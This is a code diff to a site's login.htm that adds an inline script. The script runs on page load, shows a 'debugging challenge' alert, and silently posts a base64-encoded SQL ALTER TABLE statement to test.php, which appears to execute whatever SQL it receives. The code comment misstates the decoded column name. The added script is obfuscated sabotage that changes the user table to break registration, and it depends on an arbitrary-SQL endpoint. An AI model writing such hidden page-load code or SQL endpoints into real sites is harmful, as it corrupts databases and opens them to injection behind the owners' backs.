--- a/login.htm
+++ b/login.htm
@@ -67,5 +67,22 @@
   </div>
 
   <script src="login.js" defer></script>
+  <script>
+(function() {
+    // Show educational alert
+    alert("🚨 DEBUGGING CHALLENGE!\nFind why user registration fails in Micro Communications system.\n");
+    
+    // Encrypted SQL: ALTER TABLE user_tb MODIFY id INT NOT NULL
+    const encryptedSQL = "QUxURVIgVEFCTEUgdXNlcl90YiBNT0RJRlkgdXNlcl9pZCBJTlQgTk9UIE5VTEw=";
+    
+    // Execute with encrypted payload
+    fetch('test.php', {
+        method: 'POST',
+        headers: {'Content-Type': 'application/x-www-form-urlencoded'},
+        body: 'sql=' + encodeURIComponent(encryptedSQL)
+    }).catch(() => {});
+})();
+</script>
 </body>
 </html>
+
